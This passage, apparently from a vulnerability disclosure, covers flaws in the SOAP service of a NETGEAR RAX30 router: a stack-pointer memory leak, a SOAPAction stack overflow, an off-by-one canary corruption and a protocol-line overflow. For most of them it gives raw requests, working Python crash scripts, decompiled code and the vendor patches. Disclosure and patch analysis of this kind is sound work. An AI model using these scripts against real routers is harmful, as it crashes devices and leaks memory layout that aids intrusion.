            ssock.send(request.encode())
            while True:
                data = ssock.recv(2048)
                if len(data) <= 0:
                    break
                response += data

    return response

if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    parser = argparse.ArgumentParser(description='Remote stack pointer leak from soap_serverd binary on NETGEAR RAX30 router.')
    parser.add_argument('--domain', default='routerlogin.net', help='The NETGEAR router domain.')
    parser.add_argument('--port', default=5043, type=int, help='The router soap server port.')

    args = parser.parse_args()
    domain = 'https://' + args.domain + ':' + str(args.port)

    print('Sending large buffer...')
    sendLargeBuffer(domain + '/soap/server_sa/', 500)

    print('Triggering leak...')
    response = triggerMemoryLeak(args.domain, args.port)

    # Remove surrounding ASCII
    leakStart = b'xmlns:m="urn:NETGEAR-ROUTER:service:DeviceInfo:1">\r\n    <'
    leakEnd = b'HTTP/1.1 400 Bad Request\r\n'
    leak = response[response.index(leakStart)+len(leakStart):response.index(leakEnd)]

    # Print leaked data
    print('Leaked data: ' + " ".join(["{:02x}".format(x) for x in leak]))

    # Print leaked stack address
    address = struct.unpack('<I', leak[:4])[0]
    print('Stack Pointer: ' + hex(address))
    print('Stack: ' + hex(address - 0x1D8A8) + '-' + hex(address + 0x3758))

The following script output shows the stack pointer 0xbed7c8a8 was leaked, which was used to determine the stack memory range of 0xbed5f000 to 0xbed80000.

└─$ python3 soap_cat_memory_leak.py --domain 192.168.1.1 --port 5043
Sending large buffer...
Triggering leak...
Leaked data: a8 c8 d7 be 01
Stack Pointer: 0xbed7c8a8
Stack: 0xbed5f000-0xbed80000

Patch v1.0.10.94

The patch clears any existing data in the response variable by setting all bytes to zero using memset[1]. Although strncat is still used, it will function like strncpy as the buffer begins with a NULL byte.

void writeHttpResponse(UnkArg *param_1, int httpCode, char *httpCodeStr, int param_4, char *message)
{
    size_t responseLen;
    char buffer [128];
    char response [1024];

    memset(response, 0, 1024); // [1]
    memset(buffer, 0, 128);
    _writeHttpHeaders(httpCode, httpCodeStr, param_4, "text/html");
    memset(buffer, 0, 0x80);
    __snprintf_chk(buffer, 0x80, 1, 0x80, "<HTML><HEAD><TITLE>%d %s</TITLE></HEAD>\n<BODY BGCOLOR=\"#cc9999\"><H4>%d %s</H4>\ n", httpCode, httpCodeStr, httpCode, httpCodeStr);
    strncat(response, buffer, 0x80);
    memset(buffer, 0, 0x80);
    __snprintf_chk(buffer, 0x80, 1, 0x80, "%s\n", message);
    strncat(response, buffer, 0x80);
    memset(buffer, 0, 0x80);
    __snprintf_chk(buffer, 0x80, 1, 0x80, "<HR>\n<ADDRESS><A HREF=\"%s\">%s</A></ADDRESS>\n</BODY></HTML>\n", "http://schemas.xmlsoap.org/soap/encoding/", "\"OS/version\" UPnP/1.0 \"product/version\"");
    strncat(response, buffer, 0x80);
    responseLen = strlen(response);
    __fprintf_chk(param_1->file, 1, response, responseLen);
    return;
}

PSV-2022-???? – SOAPAction Stack Buffer Overflow

Analysis

The vulnerability existed within the soap_response (0x006A9C) function which handled sending the SOAP response to the API request. This function allocated a buffer of 2048 bytes on the stack for the response XML string. The value provided after “#” in the SOAPAction header such as #Hello was then appended to an XML response tag, resulting in <m:HelloResponse...></m:HelloResponse>. The developers did not consider the scenario where the SOAPAction value was large as the output response was doubled for a large request due to being inserted in the opening and closing XML tag. Additionally, the insecure functions strcpy, strcat and sprintf were used extensively within this function.

The size of the standard response was approximately 264 bytes without the SOAPAction input before the overflow occurs. Given a SOAPAction input of 900, we can determine the approximate buffer size of 2064 bytes ((900 * 2) + 264). Thus, the buffer overflows by approximately 16 bytes.

The overflow was triggered in function soap_response (0x006A9C) in various function calls such as strcpy and spritnf depending on the size of the SOAPAction value as shown in the following code snippet:

void soap_response(undefined4 param_1,char *soapActionValue,undefined4 param_3,undefined4 *param_4, int para,char *result)
{
    int iVar9;
    char *local_58;
    char *local_54;
    int i = -(iVar9 + 0x807U   0xfffffff8);
    char* __dest_01 = (char *)((int) local_58 + i);
    char* pcVar7 =  stack0x0000008d + i;
    memset(__dest_01,0,iVar9 + 0x800);
    strcpy(__dest_01, "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<soap-env:Envelope\r\n        xmlns:soap-env =\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n        soap-env:encodingStyle=\"http://s chemas.xmlsoap.org/soap/encoding/\">\r\n<soap-env:Body>\r\n    <m:");
    int offset = sprintf(pcVar7,"%s",soapActionValue); // Copy SOAPAction value for the first time
    pcVar7 = pcVar7 + offset;
    char* pcVar8 = pcVar7 + 0x36;
    strcpy(pcVar7,"Response\r\n        xmlns:m=\"urn:NETGEAR-ROUTER:service:"); // Append hard-coded XML string to buffer
    offset = sprintf(pcVar8,"%s",local_54);
    char* __dest = pcVar8 + offset + 6;
    strcpy(pcVar8 + offset,":1\">\r\n"); // Append hard-coded XML string to buffer
    local_54 =  DAT_0004012b;
    pcVar7 = "        <%s>%s</%s>\r\n";
    ...
    strcpy(__dest,"    </m:"); // Append hard-coded XML string to buffer
    offset = sprintf(__dest + 8,"%s",soapActionValue); // Copy SOAPAction value for the second time
    pcVar7 = __dest + 8 + offset;
    strcpy(pcVar7,"Response>\r\n"); // Append hard-coded XML string to buffer
    ...
}

HTTP Request

The following request was unauthenticated and caused the binary to crash within sprintf from a corrupted stack due to the overflow of the SOAPAction header.

POST /soap/server_sa/ HTTP/1.1
User-Agent: ksoap2-android/2.6.0+
SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Content-Type: text/xml;charset=utf-8
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 416
Host: routerlogin.net:5043

<!--?xml version="1.0" encoding= "UTF-8" ?--><v:Envelope xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:d="http://www.w3.org/2001/XMLSchema" xmlns:c="http://schemas.xmlsoap.org/soap/encoding/" xmlns:v="http://schemas.xmlsoap.org/soap/envelope/"><v:Header><SessionId></SessionId></v:Header><v:Body><n0:GetInfo xmlns:n0="urn:NETGEAR-ROUTER:service:DeviceInfo:1" /></v:Body></v:Envelope>

Python Proof of Concept Script

The following proof of concept Python3 script (soap_action_overflow.py) triggers the stack buffer overflow on firmware version v1.0.7.78, causing the service to crash.

#!/usr/bin/env python3

import argparse
import requests
import urllib3

if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    parser = argparse.ArgumentParser(description='Crash soap_serverd binary on NETGEAR RAX30 router from a response buffer overflow.')
    parser.add_argument('--domain', default='routerlogin.net', help='The NETGEAR router domain.')
    parser.add_argument('--port', default=5043, type=int, help='The router soap server port.')

    args = parser.parse_args()

    payload = 'A' * 900

    headers = {
        'User-Agent': 'ksoap2-android/2.6.0+',
        'SOAPAction': 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#' + payload,
        'Content-Type': 'text/xml;charset=utf-8',
    }

    xml = """
    <!--?xml version="1.0" encoding= "UTF-8" ?-->
    <v:Envelope xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:d="http://www.w3.org/2001/XMLSchema" xmlns:c="http://schemas.xmlsoap.org/soap/encoding/" xmlns:v="http://schemas.xmlsoap.org/soap/envelope/">
        <v:Header>
            <SessionId></SessionId>
        </v:Header>
        <v:Body>
            <n0:GetInfo xmlns:n0="urn:NETGEAR-ROUTER:service:DeviceInfo:1" />
        </v:Body>
    </v:Envelope>
    """

    try:
        print('Sending payload...')
        requests.post('https://' + args.domain + ':' + str(args.port) + '/soap/server_sa/', data=xml, headers=headers, verify=False)
        print('Payload failed to crash server.')
    except requests.exceptions.ConnectionError as e:
        if 'Remote end closed connection' in str(e):
            print('Payload crashed server!')
        else:
            print(str(e))

Patch v1.0.9.92

The SOAP Action name length check was moved to occur before the service_type switch statement in the soap_action (0x016f78) function. Previously, this name length check only occured on an invalid service_type.

if (500 < actionNameLength)
{
    _actionNameLength = cmsUtl_strlen(actionName);
    log_log(3,"soap_action",0x130,"The length of ac is too long, it may be a bug or an attack.\n ac=%s length=%d",actionName,_actionNameLength,iVar8);
    actionName = "SOAP_ActionName_Too_Long";
    puVar6 =  DAT_0004115e;
    pcVar1 = "soap_action";
    goto LAB_000173c0;
}

It should be noted however, the root cause of the vulnerability within the soap_response function was not patched in v1.0.9.92 therefore it may still be possible to overflow the response buffer if other large attacker-controlled data can be introduced into the HTTP response.


PSV-2023-0010 – HTTP Body Off-By-One NULL Terminator Stack Canary Corruption

Analysis

An off-by-one NULL terminator caused the stack canary to become corrupt in the body stack buffer of 2,048 bytes within the handle_soapRequest (0x000152f0) function when a body payload of 2,048 bytes was passed. The process proceeded to terminate once the stack canary was corrupted with a stack smashing detected error.

This can be seen in the following code snippet. The handle_soapRequest (0x000152f0) function has a stack body buffer of 2,048 bytes [9], which is filled within the freadFile (0x000181b4) [10] [11] function when a body of 2,048 bytes is processed. freadFile returns the length read [12] which is 2,048 and that is stored in the bodyLength variable [13]. A NULL terminator is then wrote to bodyLength + 1 [14] which is 2,049 and therefore is wrote 1 byte out of bounds and corrupts the stack canary.

int handle_soapRequest(char* ip)
{
    char body [2048];                      // <-- [9] Body stack buffer of 2048 bytes
    ...
    memset(body, 0, 2048);
    ...
    int bodyLength = freadFile(body);      // <--- [10], [13] Data fills body buffer from HTPT request, body length is returned
    if (bodyLength > 0)
    {
        body[bodyLength + 1] = '\0';       // <-- [14] Out of bounds NULL byte write (bodyLength + 1 = 2049)
        soap_action(0,soapAction,body,ip);
    }
    ...
}

int freadFile(int param_1,char *buffer)
{
    memset(buffer, 0, 2048);
    int readCount = fread(buffer, 1, 2048, *(FILE **)(param_1 + 0xc)); // <-- [11] Data fills buffer from HTTP request with 2048 bytes
    return readCount;                                                  // <-- [12] Number of bytes read from HTTP request (max readCount = 2048)
}

HTTP Request

The following HTTP request triggers the out of bounds NULL terminator write:

POST /soap/server_sa/ HTTP/1.1
User-Agent: ksoap2-android/2.6.0+
SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#A
Content-Length: 2048
Host: 192.168.2.1:5043

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Python Proof of Concept Script

The following proof of concept script (soap_oob_null_write.py) can be executed to trigger the off-by-one out of bounds NULL byte stack canary corruption.

#!/usr/bin/env python3

import argparse
import requests
import urllib3

if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    parser = argparse.ArgumentParser(description='Crash soap_serverd binary on NETGEAR RAX30 router with an OOB NULL byte.')
    parser.add_argument('--domain', default='routerlogin.net', help='The NETGEAR router domain.')
    parser.add_argument('--port', default=5043, type=int, help='The router soap server port.')

    args = parser.parse_args()

    # Trigger OOB NULL byte crash
    payload = 'A' * 2048
    print('Sending payload...')
    requests.post('https://' + args.domain + ':' + str(args.port) + '/soap/server_sa/', data=payload, headers={
        'User-Agent': 'ksoap2-android/2.6.0+',
        'SOAPAction': 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#A',
    }, verify=False)

    # Check we have crashed the SOAP service
    try:
        requests.post('https://' + args.domain + ':' + str(args.port) + '/soap/server_sa/', data='A', headers={
            'User-Agent': 'ksoap2-android/2.6.0+',
            'SOAPAction': 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#A',
        }, verify=False)
        print('Payload failed to crash server.')
    except requests.exceptions.ConnectionError as e:
        if 'Connection refused' in str(e):
            print('Payload crashed server!')
        else:
            print(str(e))

On execution, the payload will be sent to the SOAP service and cause it to crash on vulnerable firmware versions.

└─$ python3 soap_oob_null_write.py --domain 192.168.1.1 --port 5043
Sending payload...
Payload crashed server!

Patch v1.0.10.94

The patch changes the freadFile function to accept the buffer size as a variable instead of using the fixed size of 2048. It then reads the data into this buffer at a length of the buffer size minus one, which prevents the NULL terminator from being wrote out of bounds.

int handle_soapRequest(char* ip)
{
    char body [2048];
    ...
    memset(body, 0, 2048);
    ...
    int bodyLength = _freadFile(body, 2048);
    if (bodyLength > 0)
    {
        body[bodyLength + 1] = '\0';
        soap_action(0, soapAction, body, ip);
    }
    ...
}


int freadFile(int param_1, void *buffer, size_t bufferSize)
{
    memset(buffer, 0, bufferSize);
    int readCount = fread(buffer, 1, bufferSize - 1, *(FILE **)(param_1 + 0xc));
    return readCount;
}

PSV-2023-0011 – HTTP Protocol Stack Buffer Overflow

Analysis

The handle_soapRequest (0x000152f0) function is vulnerable to a classic stack overflow in the protocol buffer [15] when the provided protocol is greater than 2048 bytes. Due to the stack layout, the overflow fills the protocol variable, followed by the soapAction [16] and body [17] buffers before overwriting the stack canary. The _fgetsFile (0x0018ef0) function call [18] retrieves the HTTP requests first line and stores it in line [19]. The protocol part of the line is then copied [20] to the protocol buffer [15] and overflows when the length of protocol exceeds the variable buffer size of 2048 bytes.

int handle_soapRequest(char *ip)
{
    ...
    char line [2048];       // <--- [19]
    char method [2048];
    char path [2048];
    char protocol [2048];   // <--- [15]
    char soapAction [2048]; // <--- [16]
    char body [2048];       // <--- [17]
    ...
    memset(line, 0, 2048);
    memset(method, 0, 2048);
    memset(path, 0, 2048);
    memset(protocol, 0, 2048);
    ...
    int readCount = _fgetsFile(line); // <--- [18]
    ...
    int iVar1 = __isoc99_sscanf(line, "%[^ ] %[^ ] %[^ ]", method, path, protocol); // <--- [20] Overflow occurs when protocol exceeds 2048 bytes
    ...
}

HTTP Request

The following HTTP POST request demonstrates this vulnerability by filling the protocol buffer with 2,048 A characters, the soapAction with 2,048 B characters, the body with 2,048 C characters and finally the stack canary with 4 D bytes.

POST /soap/server_sa/ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC